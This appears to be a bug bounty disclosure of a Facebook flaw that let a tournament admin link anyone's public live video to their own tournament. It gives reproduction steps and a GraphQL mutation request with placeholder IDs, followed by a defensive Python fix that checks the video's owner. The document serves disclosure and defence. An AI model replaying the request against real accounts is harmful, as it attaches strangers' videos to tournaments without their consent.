Published On: 05 Feb 2022
Tournament participants or admins can attach their live videos to the tournaments in which they are participating; from these videos, event admins can choose one as the primary tournament video. While doing so, a malicious tournament admin can choose any live video on Facebook, and it will automatically be linked with the tournament.
A malicious user could attach their own tournament to any live video. Once the owner has ended the live video, there will be a prompt saying 'Playing in tournament : TournamentOne'
Step 1
FBDL run
Script:
[setup]
User UserOne
User UserTwo
User UserThree
Event EventOne with {owner: UserOne, place: UserOne, show_guest_list:false}
[action]
UserOne create_tournament TournamentOne with {event: EventOne}
Results:
UserOne => 100072051960992
UserTwo => 100071719178311
UserThree => 100072022111868
EventOne => 177488881019368
TournamentOne => 174561821413310
Step 2
Users:
1. UserOne
2. UserTwo
3. UserThree
Environment:
1. EventOne : Admin : UserOne
2. TournamentOne : Linked with EventOne
Step 3
1. Log in as UserOne
2. Browse TournamentOne/ Participants/ Add two participants
3. Brackets/Start tournament/
4. View page source code and copy arena_id
Step 4
4. Log in as UserTwo using FB4A
5. Go live (Privacy: Public): LiveOne
Step 5
6. Interacting as UserOne, get an access token for Facebook for Android
POST /api/graphql/
variables={"input":{"client_mutation_id":"4","actor_id":"USER_ID","arena_id":"ARENA_ID","video_id":"LIVEONE_VIDEO_ID"},"scale":1}
doc_id=4001333603328687
Step 6
7. Now, interacting as UserTwo, end the live video
Step 7
8. Log in as UserThree (desktop version) and play LiveOne
There will be a prompt saying UserTwo is playing in TournamentOne.
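
One way to enforce the rule from the description on the server side, as an added example (not code from this write-up or from Facebook): the handler resolves the video's owner itself and links the video only if that owner is a member of the tournament. The data model, the function names, and the ParticipantA/ParticipantB accounts are assumptions, and all IDs are constructed placeholders.

```python
from dataclasses import dataclass, field

class LinkDenied(Exception):
    """Raised when a video may not be attached to a tournament."""

@dataclass
class Tournament:  # hypothetical model, not Facebook's schema
    arena_id: str
    admins: set
    participants: set
    linked_videos: set = field(default_factory=set)

# Constructed sample data mirroring the report's scenario (video_id -> owner).
VIDEO_OWNERS = {"LIVEONE_VIDEO_ID": "UserTwo", "PARTICIPANT_LIVE_ID": "ParticipantA"}

def new_tournament():
    return Tournament("ARENA_ID", {"UserOne"}, {"ParticipantA", "ParticipantB"})

def link_video_unchecked(t, actor_id, video_id):
    # Models the reported behaviour: only the actor's admin role is checked.
    if actor_id not in t.admins:
        raise LinkDenied("actor is not a tournament admin")
    t.linked_videos.add(video_id)

def link_video_checked(t, actor_id, video_id):
    members = t.admins | t.participants
    if actor_id not in members:
        raise LinkDenied("actor has no role in this tournament")
    owner = VIDEO_OWNERS.get(video_id)  # resolved server-side, never from the request
    if owner is None:
        raise LinkDenied("unknown video")
    if owner not in members:
        raise LinkDenied("video owner is not in this tournament")
    if actor_id not in t.admins and owner != actor_id:
        raise LinkDenied("participants may attach only their own video")
    t.linked_videos.add(video_id)

def allowed(link_fn, actor_id, video_id):
    """Run link_fn against a fresh tournament and report whether the link was made."""
    t = new_tournament()
    try:
        link_fn(t, actor_id, video_id)
    except LinkDenied:
        return False
    return video_id in t.linked_videos
```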